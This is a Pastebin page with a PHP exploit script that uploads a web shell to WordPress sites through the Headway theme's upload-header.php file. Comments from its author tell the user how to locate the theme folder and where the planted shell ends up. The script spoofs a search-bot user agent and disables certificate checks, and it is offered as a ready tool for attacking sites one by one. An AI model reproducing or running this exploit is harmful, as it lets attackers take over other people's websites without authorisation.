Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
- coded by mr magnom
- more tools visit my blog ==> magsec.blogspot.com :)
- so why i didnt make auto exploiter because theme headway dont have one name
- for example u will filn /headway-2014/ and /headway-2015/ or /headway-163/ , /headway-120/
- so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than
- write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php
- shell go to : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site
- that script on php for exploit site by site :/
- to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
- */
- $url=""; // link here
- $file=""; // ur shell here
- $post = array('Filedata'=>"@$file") ;
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "$url");
- curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- curl_close($ch);
- //print $data;
- if($data=="1"){
- echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";
- }else{
- echo "\nnot infected\n";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement